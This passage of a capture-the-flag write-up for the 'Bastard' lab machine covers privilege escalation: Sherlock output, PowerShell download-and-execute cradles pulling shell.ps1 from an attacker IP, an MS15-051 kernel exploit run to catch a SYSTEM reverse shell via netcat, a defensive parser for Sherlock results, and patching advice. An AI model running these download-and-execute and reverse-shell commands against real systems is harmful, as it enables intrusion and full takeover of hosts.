PS C:\users\dimitris\Desktop> type user.txt
{your_own_flag_here}

It appears we do. Awesome. Let’s figure out how to privesc.

 

Privilege Escalation

Let’s run Sherlock. We’ll place the Sherlock.ps1 file in our exploits folder which is being hosted over simpleHTTP, and download and run it from the initial Drupalgeddon cmd shell. Doing this seems to cause the shell to die, so let’s use the Drupalgeddon shell to spawn another shell:

drupalgeddon2>> powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/shell.ps1')"
PS C:\inetpub\drupal-7.54> powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/Sherlock.ps1')"

PS C:\inetpub\drupal-7.54>  powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/Sherlock.ps1')"


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
             6-034?
VulnStatus : Not Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Not Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
             tml
VulnStatus : Not Vulnerable
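Sherlock's output is a list of key: value blocks, with long Link values wrapped onto an indented second line (MS16-034 and MS16-135 above), which trips up a naive grep for "Appears Vulnerable". The parser below is an added example for turning that output into a patch-gap list a defender can check against installed updates; it is not part of Sherlock or of the writeup. Its input is a constructed excerpt of the output shown above, chosen to include one wrapped Link.

```python
# Constructed excerpt of the Sherlock output above: a subset of the blocks,
# including the one whose Link wraps onto an indented continuation line.
SHERLOCK_OUTPUT = """\

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
             6-034?
VulnStatus : Not Vulnerable
"""


def parse_sherlock(text):
    """Split Sherlock output into one dict per finding.
    A blank line ends a block; a line starting with whitespace is the wrapped
    remainder of the previous value and is glued back on without a separator
    (the wrap splits URLs mid-token, so no space belongs there)."""
    findings, current, last_key = [], {}, None
    for raw in text.splitlines():
        if not raw.strip():
            if current:
                findings.append(current)
            current, last_key = {}, None
            continue
        if raw[0].isspace() and last_key:
            current[last_key] += raw.strip()
            continue
        key, _, value = raw.partition(":")   # first colon only: URLs contain more
        key = key.strip()
        current[key] = value.strip()
        last_key = key
    if current:
        findings.append(current)
    return findings


def by_status(findings):
    """Group bulletin IDs by Sherlock's verdict, e.g. for a summary table."""
    summary = {}
    for finding in findings:
        status = finding.get("VulnStatus", "Unknown")
        summary.setdefault(status, []).append(finding.get("MSBulletin", "N/A"))
    return summary


def appears_vulnerable(findings):
    """The bulletins to verify first against the host's installed updates."""
    return [f["MSBulletin"] for f in findings if f.get("VulnStatus") == "Appears Vulnerable"]


if __name__ == "__main__":
    parsed = parse_sherlock(SHERLOCK_OUTPUT)
    print("missing patches to verify:", appears_vulnerable(parsed))
    print(by_status(parsed))
```

Sherlock reaches its verdicts by checking versions of the affected system files, so "Appears Vulnerable" is a prompt to confirm against the installed-update list (which systeminfo above reported as empty), not a confirmation by itself; the bulletin IDs this returns are exactly what a patch-compliance check needs as input.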

 

gaining system via a kernel exploit

As expected, since it’s an unpatched 2008R2 box, there are a number of kernel exploits we could run. Let’s use MS15-051, since we’ve had success with that before. I already have the executable for the compiled PoC, but you can find more information on where to find it and how to use it in my Arctic writeup.

We’ll start by transferring the exe to our exploits folder, then download the file to the target machine. From the target host we can run:

powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.50:8080/ms15-051.exe','C:\inetpub\drupal-7.54\ms15-051.exe')"

The usage instructions for this particular MS15-051 PoC have us pass a command in quotes after calling the executable; if the exploit works, that command runs as NT AUTHORITY\SYSTEM. Let’s have the exe call and run our shell.ps1 script again: we’ll start another listener on 4444 and hopefully catch a SYSTEM shell.

Start the listener again with nc -lvnp 4444

Then run the exploit with:

PS C:\inetpub\drupal-7.54> .\ms15-051.exe "powershell.exe -c IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.50:8080/shell.ps1')"

And if we check our listener, we see we got a reverse shell:

root@kali:/writeups/HTB/bastard/exploits# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.9] 58284
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\drupal-7.54>whoami
nt authority\system
PS C:\inetpub\drupal-7.54> 

Awesome, we’re SYSTEM. From here we can grab root.txt and call it done.

PS C:\inetpub\drupal-7.54> cd c:\users\Administrator\Desktop
PS C:\users\Administrator\Desktop> dir


    Directory: C:\users\Administrator\Desktop


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-ar--         19/3/2017   7:34 ??         32 root.txt.txt                      


PS C:\users\Administrator\Desktop> type root.txt.txt
{your-fl4g-h3r3}
PS C:\users\Administrator\Desktop> 

 

 

Conclusion

 

  • The Drupal install should be updated/patched (to 7.58 or later) to address the RCE vulnerability, and version-disclosing files such as CHANGELOG.txt should not be reachable from the web.
  • A Web Application Firewall (WAF) would ideally be put in place in front of the webserver.
  • The OS should be patched to mitigate kernel exploits and other security vulnerabilities; systeminfo showed no hotfixes installed at all.

 

 

All for now; until next time.

~@initinfosec
